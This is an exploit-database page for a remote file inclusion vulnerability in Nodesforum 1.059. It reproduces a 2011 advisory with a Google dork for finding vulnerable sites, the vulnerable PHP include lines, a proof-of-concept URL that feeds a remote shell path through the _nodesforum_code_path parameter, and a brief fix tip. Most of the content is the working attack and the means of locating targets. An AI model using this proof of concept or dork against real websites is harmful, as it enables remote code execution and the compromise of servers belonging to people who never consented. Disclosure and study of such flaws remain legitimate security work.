[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nodesforum 1.059 Remote File Inclusion Vulnerability

Author
bd0rk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16400
Category
web applications
Date add
23-06-2011
Platform
php
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/2011
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: http://home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Vulnerable Code in 3rd_party_limits.php line 6 - 8
 
--------------------------------------------------------------------------------------------------------------
 
$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}
 
--------------------------------------------------------------------------------------------------------------
 
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.
 
 
 
 
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
 
 
Fixtip: Declare $_nodesforum_code_path, likewise!
 
 
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
 
 
 
#### The 22 years old, german Hacker bd0rk #### <---white-hat



#  0day.today [2024-09-28]  #